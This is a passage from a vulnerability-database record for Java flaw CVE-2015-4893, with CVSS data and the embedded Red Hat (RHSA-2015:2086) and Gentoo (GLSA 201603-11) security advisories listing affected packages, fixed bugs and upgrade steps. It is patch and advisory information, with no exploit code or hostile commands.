null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-4893", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-4893", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-4893" }, { "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "db": "NVD", "id": "CVE-2015-4893" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60; Java SE Embedded 8u51; and JRockit R28.3.7 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2015-4803 and CVE-2015-4911. This vulnerability CVE-2015-4803 and CVE-2015-4911 Is a different vulnerability.Service disruption by a third party (DoS) An attack may be carried out. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027JAXP\u0027 sub-component. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.6.0-openjdk security update\nAdvisory ID: RHSA-2015:2086-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2086.html\nIssue date: 2015-11-18\nCVE Names: CVE-2015-4734 CVE-2015-4803 CVE-2015-4805 \n CVE-2015-4806 CVE-2015-4835 CVE-2015-4842 \n CVE-2015-4843 CVE-2015-4844 CVE-2015-4860 \n CVE-2015-4872 CVE-2015-4881 CVE-2015-4882 \n CVE-2015-4883 CVE-2015-4893 CVE-2015-4903 \n CVE-2015-4911 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix multiple security issues are\nnow available for Red Hat Enterprise Linux 5, 6, and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit. \n\nMultiple flaws were discovered in the CORBA, Libraries, RMI, Serialization,\nand 2D components in OpenJDK. An untrusted Java application or applet could\nuse these flaws to completely bypass Java sandbox restrictions. \n(CVE-2015-4835, CVE-2015-4881, CVE-2015-4843, CVE-2015-4883, CVE-2015-4860,\nCVE-2015-4805, CVE-2015-4844)\n\nMultiple denial of service flaws were found in the JAXP component in\nOpenJDK. A specially crafted XML file could cause a Java application using\nJAXP to consume an excessive amount of CPU and memory when parsed. \n(CVE-2015-4803, CVE-2015-4893, CVE-2015-4911)\n\nIt was discovered that the Security component in OpenJDK failed to properly\ncheck if a certificate satisfied all defined constraints. In certain cases,\nthis could cause a Java application to accept an X.509 certificate which\ndoes not meet requirements of the defined policy. (CVE-2015-4872)\n\nMultiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass certain Java sandbox restrictions. (CVE-2015-4806,\nCVE-2015-4882, CVE-2015-4842, CVE-2015-4734, CVE-2015-4903)\n\nRed Hat would like to thank Andrea Palazzo of Truel IT for reporting the\nCVE-2015-4806 issue. \n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1233687 - CVE-2015-4806 OpenJDK: HttpURLConnection header restriction bypass (Libraries, 8130193)\n1273022 - CVE-2015-4835 OpenJDK: insufficient permission checks in StubGenerator (CORBA, 8076383)\n1273027 - CVE-2015-4881 OpenJDK: missing type checks in IIOPInputStream (CORBA, 8076392)\n1273053 - CVE-2015-4843 OpenJDK: java.nio Buffers integer overflow issues (Libraries, 8130891)\n1273304 - CVE-2015-4883 OpenJDK: incorrect access control context used in DGCClient (RMI, 8076413)\n1273308 - CVE-2015-4860 OpenJDK: incorrect access control context used in DGCImpl (RMI, 8080688)\n1273311 - CVE-2015-4805 OpenJDK: missing checks for proper initialization in ObjectStreamClass (Serialization, 8103671)\n1273318 - CVE-2015-4844 ICU: missing boundary checks in layout engine (OpenJDK 2D, 8132042)\n1273414 - CVE-2015-4882 OpenJDK: incorrect String object deserialization in IIOPInputStream (CORBA, 8076387)\n1273425 - CVE-2015-4842 OpenJDK: leak of user.dir location (JAXP, 8078427)\n1273430 - CVE-2015-4734 OpenJDK: kerberos realm name leak (JGSS, 8048030)\n1273496 - CVE-2015-4903 OpenJDK: insufficient proxy class checks in RemoteObjectInvocationHandler (RMI, 8076339)\n1273637 - CVE-2015-4803 OpenJDK: inefficient use of hash tables and lists during XML parsing (JAXP, 8068842)\n1273638 - CVE-2015-4893 OpenJDK: incomplete MaxXMLNameLimit enforcement (JAXP, 8086733)\n1273645 - CVE-2015-4911 OpenJDK: incomplete supportDTD enforcement (JAXP, 8130078)\n1273734 - CVE-2015-4872 OpenJDK: incomplete constraints enforcement by AlgorithmChecker (Security, 8131291)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.i386.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.i386.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm\n\nppc64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm\n\ns390x:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.s390x.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.s390x.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.s390x.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm\n\ns390x:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.s390x.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.s390x.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.s390x.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.s390x.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-4734\nhttps://access.redhat.com/security/cve/CVE-2015-4803\nhttps://access.redhat.com/security/cve/CVE-2015-4805\nhttps://access.redhat.com/security/cve/CVE-2015-4806\nhttps://access.redhat.com/security/cve/CVE-2015-4835\nhttps://access.redhat.com/security/cve/CVE-2015-4842\nhttps://access.redhat.com/security/cve/CVE-2015-4843\nhttps://access.redhat.com/security/cve/CVE-2015-4844\nhttps://access.redhat.com/security/cve/CVE-2015-4860\nhttps://access.redhat.com/security/cve/CVE-2015-4872\nhttps://access.redhat.com/security/cve/CVE-2015-4881\nhttps://access.redhat.com/security/cve/CVE-2015-4882\nhttps://access.redhat.com/security/cve/CVE-2015-4883\nhttps://access.redhat.com/security/cve/CVE-2015-4893\nhttps://access.redhat.com/security/cve/CVE-2015-4903\nhttps://access.redhat.com/security/cve/CVE-2015-4911\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201603-11\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: March 12, 2016\n Bugs: #525472, #540054, #546678, #554886, #563684, #572432\n ID: 201603-11\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Oracle\u0027s JRE and JDK\nsoftware suites allowing remote attackers to remotely execute arbitrary\ncode, obtain information, and cause Denial of Service. \n\nBackground\n==========\n\nJava Platform, Standard Edition (Java SE) lets you develop and deploy\nJava applications on desktops and servers, as well as in today\u0027s\ndemanding embedded environments. Java offers the rich user interface,\nperformance, versatility, portability, and security that today\u0027s\napplications require. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JRE Users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.8.0.72\"\n\nAll Oracle JDK Users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.8.0.72\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-0437\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0437\n[ 2 ] CVE-2015-0437\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0437\n[ 3 ] CVE-2015-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0458\n[ 4 ] CVE-2015-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0459\n[ 5 ] CVE-2015-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0460\n[ 6 ] CVE-2015-0469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0469\n[ 7 ] CVE-2015-0470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0470\n[ 8 ] CVE-2015-0477\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0477\n[ 9 ] CVE-2015-0478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0478\n[ 10 ] CVE-2015-0480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0480\n[ 11 ] CVE-2015-0484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0484\n[ 12 ] CVE-2015-0486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0486\n[ 13 ] CVE-2015-0488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0488\n[ 14 ] CVE-2015-0491\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0491\n[ 15 ] CVE-2015-0492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0492\n[ 16 ] CVE-2015-2590\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2590\n[ 17 ] CVE-2015-2601\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2601\n[ 18 ] CVE-2015-2613\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2613\n[ 19 ] CVE-2015-2619\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2619\n[ 20 ] CVE-2015-2621\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2621\n[ 21 ] CVE-2015-2625\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2625\n[ 22 ] CVE-2015-2627\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2627\n[ 23 ] CVE-2015-2628\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2628\n[ 24 ] CVE-2015-2632\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2632\n[ 25 ] CVE-2015-2637\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2637\n[ 26 ] CVE-2015-2638\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2638\n[ 27 ] CVE-2015-2659\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2659\n[ 28 ] CVE-2015-2664\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2664\n[ 29 ] CVE-2015-4000\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000\n[ 30 ] CVE-2015-4729\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4729\n[ 31 ] CVE-2015-4731\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4731\n[ 32 ] CVE-2015-4732\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4732\n[ 33 ] CVE-2015-4733\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4733\n[ 34 ] CVE-2015-4734\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4734\n[ 35 ] CVE-2015-4734\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4734\n[ 36 ] CVE-2015-4736\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4736\n[ 37 ] CVE-2015-4748\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4748\n[ 38 ] CVE-2015-4760\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4760\n[ 39 ] CVE-2015-4803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4803\n[ 40 ] CVE-2015-4803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4803\n[ 41 ] CVE-2015-4805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4805\n[ 42 ] CVE-2015-4805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4805\n[ 43 ] CVE-2015-4806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4806\n[ 44 ] CVE-2015-4806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4806\n[ 45 ] CVE-2015-4810\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4810\n[ 46 ] CVE-2015-4810\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4810\n[ 47 ] CVE-2015-4835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4835\n[ 48 ] CVE-2015-4835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4835\n[ 49 ] CVE-2015-4840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4840\n[ 50 ] CVE-2015-4840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4840\n[ 51 ] CVE-2015-4842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4842\n[ 52 ] CVE-2015-4842\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4842\n[ 53 ] CVE-2015-4843\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4843\n[ 54 ] CVE-2015-4843\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4843\n[ 55 ] CVE-2015-4844\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4844\n[ 56 ] CVE-2015-4844\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4844\n[ 57 ] CVE-2015-4860\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4860\n[ 58 ] CVE-2015-4860\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4860\n[ 59 ] CVE-2015-4868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4868\n[ 60 ] CVE-2015-4868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4868\n[ 61 ] CVE-2015-4871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4871\n[ 62 ] CVE-2015-4871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4871\n[ 63 ] CVE-2015-4872\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4872\n[ 64 ] CVE-2015-4872\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4872\n[ 65 ] CVE-2015-4881\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4881\n[ 66 ] CVE-2015-4881\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4881\n[ 67 ] CVE-2015-4882\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4882\n[ 68 ] CVE-2015-4882\n 